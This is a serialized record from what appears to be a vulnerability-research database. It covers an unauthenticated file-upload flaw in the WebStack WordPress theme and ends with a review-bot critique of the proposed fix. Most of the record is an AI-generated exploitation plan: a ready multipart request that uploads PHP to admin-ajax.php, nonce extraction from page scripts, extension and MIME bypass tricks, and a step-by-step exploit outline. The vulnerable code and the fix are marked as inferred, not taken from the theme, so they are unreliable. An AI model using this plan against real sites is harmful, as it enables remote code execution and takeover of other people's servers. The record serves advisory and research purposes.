[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAElJ2wVAWu9uR-jF4p6z-9wFN-R-ENY7Lf5uSkaaJZ4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":8,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":8,"patch_diff_files":19,"patch_trac_url":8,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":8,"poc_status":8,"poc_video_id":8,"poc_summary":8,"poc_steps":8,"poc_tested_at":8,"poc_wp_version":8,"poc_php_version":8,"poc_playwright_script":8,"poc_exploit_code":8,"poc_has_trace":21,"poc_model_used":8,"poc_verification_depth":8,"source_links":31},"CVE-2026-1555","webstack-unauthenticated-arbitrary-file-upload","WebStack \u003C= 1.2024 - Unauthenticated Arbitrary File Upload","The WebStack theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the io_img_upload() function in all versions up to, and including, 1.2024. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.",null,"webstack","\u003C=1.2024","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-14 14:52:49","2026-04-15 03:37:20",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb97805de-1b47-4c9f-baae-2e37c1b78570?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1555 (WebStack Theme Unauthenticated Arbitrary File Upload)\n\n## 1. 
Vulnerability Summary\nThe WebStack theme for WordPress (versions \u003C= 1.2024) contains a critical unauthenticated arbitrary file upload vulnerability. The flaw resides in the `io_img_upload()` function, which lacks proper file type validation and is accessible to unauthenticated users via WordPress AJAX handlers. An attacker can upload a malicious PHP script and execute it, leading to Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `io_img_upload` (inferred from function name)\n- **HTTP Method:** `POST`\n- **Authentication:** Unauthenticated (`wp_ajax_nopriv_` hook)\n- **Vulnerable Parameter:** The file input (typically within the `$_FILES` array).\n- **Preconditions:** The WebStack theme must be active.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A request is sent to `\u002Fwp-admin\u002Fadmin-ajax.php?action=io_img_upload`.\n2. **Hook Registration:** The theme registers the action:\n   `add_action('wp_ajax_nopriv_io_img_upload', 'io_img_upload');`\n   `add_action('wp_ajax_io_img_upload', 'io_img_upload');`\n3. **Execution:** The `io_img_upload()` function is called.\n4. **Processing:**\n   - The function likely retrieves file data from `$_FILES`.\n   - It may perform minor checks (like file size) but fails to validate the extension or MIME type against a whitelist of safe images.\n5. **Sink:** The file is saved to the filesystem using `move_uploaded_file()` or `wp_handle_upload()` without filtering for dangerous extensions like `.php`.\n\n## 4. Nonce Acquisition Strategy\nWhile many \"unauthenticated\" vulnerabilities in themes lack nonce checks entirely, the WebStack theme might implement one for AJAX.\n\n1. **Search for Nonce Registration:**\n   The agent should search for where the nonce is created in the theme:\n   `grep -rn \"wp_create_nonce\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fthemes\u002Fwebstack\u002F`\n2. 
**Identify JS Localization:**\n   Look for `wp_localize_script` to find the JavaScript variable:\n   `grep -rn \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fthemes\u002Fwebstack\u002F`\n3. **Browser Extraction:**\n   - If a nonce is required (e.g., `check_ajax_referer('io_img_upload', 'nonce')` is found in the code), the agent must find a page that enqueues the relevant script.\n   - Navigate to the homepage or a specific page (like a submission form) using `browser_navigate`.\n   - Execute: `browser_eval(\"window.theme_vars?.nonce\")` (Replace `theme_vars` with the actual identifier found in step 2).\n\n*Note: If `check_ajax_referer` is missing or called with `die=false` without a subsequent return, the nonce can be omitted or spoofed.*\n\n## 5. Exploitation Strategy\nThe goal is to upload a PHP shell via the AJAX endpoint.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Content-Type:** `multipart\u002Fform-data`\n- **Parameters:**\n    - `action`: `io_img_upload`\n    - `_ajax_nonce`: `[NONCE_VALUE]` (if required)\n    - `file` (or `img_file`): A file named `shell.php` containing `\u003C?php phpinfo(); ?>`.\n\n**Payload Crafting (Example):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123\n\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"action\"\n\nio_img_upload\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.php\"\nContent-Type: application\u002Fx-httpd-php\n\n\u003C?php echo \"VULNERABLE: \" . __FILE__; ?>\n------WebKitFormBoundaryABC123--\n```\n\n**Expected Response:**\nA JSON response or string containing the URL of the uploaded file, usually located in `wp-content\u002Fuploads\u002F`.\n\n## 6. Test Data Setup\n1. 
**Install Theme:** Ensure the WebStack theme (version \u003C= 1.2024) is installed and activated.\n   `wp theme activate webstack`\n2. **Configure Permissions:** Ensure the `wp-content\u002Fuploads` directory is writable (standard in WordPress).\n\n## 7. Expected Results\n1. The server responds with a `200 OK` and (ideally) the path to the uploaded file.\n2. Navigating to the uploaded file's URL executes the PHP code.\n\n## 8. Verification Steps\n1. **Check Filesystem:** Confirm the file exists using WP-CLI.\n   `wp eval \"echo file_exists(wp_upload_dir()['basedir'] . '\u002Fpoc.php');\"`\n2. **Search for File:** If the location is randomized:\n   `find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F -name \"poc.php\"`\n3. **Remote Execution Check:**\n   Use `http_request` to GET the uploaded file's URL and check for the string \"VULNERABLE\".\n\n## 9. Alternative Approaches\n- **Extension Bypass:** If there is a weak check (e.g., regex), try `poc.php.jpg`, `poc.phtml`, or `poc.php5`.\n- **MIME Type Spoofing:** Change the `Content-Type` header in the multipart request to `image\u002Fjpeg` while keeping the `.php` extension.\n- **Null Byte (If PHP \u003C 5.3):** Try `poc.php%00.jpg`.\n- **Action Discovery:** If `io_img_upload` is incorrect, grep the theme for `wp_ajax_nopriv_` to find all unauthenticated entry points.\n  `grep -rn \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fthemes\u002Fwebstack\u002F`","The WebStack theme for WordPress (versions \u003C= 1.2024) is vulnerable to unauthenticated arbitrary file uploads via the io_img_upload AJAX action. 
This occurs because the io_img_upload() function fails to validate file extensions or MIME types, allowing attackers to upload PHP scripts and achieve Remote Code Execution (RCE).","\u002F\u002F Inferred registration of the AJAX action in theme functions\nadd_action('wp_ajax_nopriv_io_img_upload', 'io_img_upload');\nadd_action('wp_ajax_io_img_upload', 'io_img_upload');\n\n\u002F\u002F Inferred vulnerable function structure lacking validation\nfunction io_img_upload() {\n    $file = $_FILES['file'];\n    $upload_overrides = array( 'test_form' => false );\n    $movefile = wp_handle_upload( $file, $upload_overrides );\n\n    if ( $movefile && ! isset( $movefile['error'] ) ) {\n        echo json_encode(array('status' => 1, 'data' => $movefile['url']));\n    }\n    die();\n}","--- a\u002Ffunctions.php\n+++ b\u002Ffunctions.php\n@@ -1,5 +1,10 @@\n function io_img_upload() {\n+    if ( ! check_ajax_referer( 'io_nonce', 'nonce', false ) ) {\n+        wp_send_json_error( 'Invalid nonce' );\n+    }\n     $file = $_FILES['file'];\n-    $upload_overrides = array( 'test_form' => false );\n+    $upload_overrides = array(\n+        'test_form' => false,\n+        'mimes'     => array( 'jpg|jpeg|jpe' => 'image\u002Fjpeg', 'gif' => 'image\u002Fgif', 'png' => 'image\u002Fpng' ),\n+    );\n     $movefile = wp_handle_upload( $file, $upload_overrides );","1. Endpoint: Target the \u002Fwp-admin\u002Fadmin-ajax.php endpoint with a POST request.\n2. Action: Include the 'action' parameter set to 'io_img_upload'.\n3. Nonce: If a nonce check is active, extract the required nonce value from the frontend's localized JavaScript variables (e.g., searching for 'wp_localize_script' data in the page source).\n4. Payload: Construct a multipart\u002Fform-data request containing a file field (e.g., 'file') with a malicious PHP payload (e.g., \u003C?php phpinfo(); ?>) and a .php extension.\n5. 
Execution: Parse the JSON response to find the 'data' or 'url' key, then navigate to the provided URL in the wp-content\u002Fuploads\u002F directory to trigger the uploaded PHP script.","gemini-3-flash-preview","2026-04-16 15:44:34","2026-04-16 15:44:51",{"type":32,"vulnerable_version":8,"fixed_version":8,"vulnerable_browse":8,"vulnerable_zip":8,"fixed_browse":8,"fixed_zip":8,"all_tags":33},"theme","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fwebstack"]
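Review bot: In the `functions.php` hunk carried in `research_fix_diff`, the added `check_ajax_referer( 'io_nonce', 'nonce', false )` guard is not an access control. The record shows `io_img_upload` registered on `wp_ajax_nopriv_io_img_upload`, and its own outline notes that the nonce is available to any visitor through localized script data, so anonymous uploads remain possible and the `mimes` allowlist is the only effective restriction. If anonymous upload is not a requirement, drop the `nopriv` registration or add a `current_user_can( 'upload_files' )` check before `wp_handle_upload()`. The unchanged `$file = $_FILES['file'];` line also reads the key without an `isset()` test, so a request with no file part should be rejected explicitly before the upload call. The record lists `patched_in_version` as null and `patch_diff_files` as empty, so this hunk should be read as a proposed fix rather than the theme's shipped change.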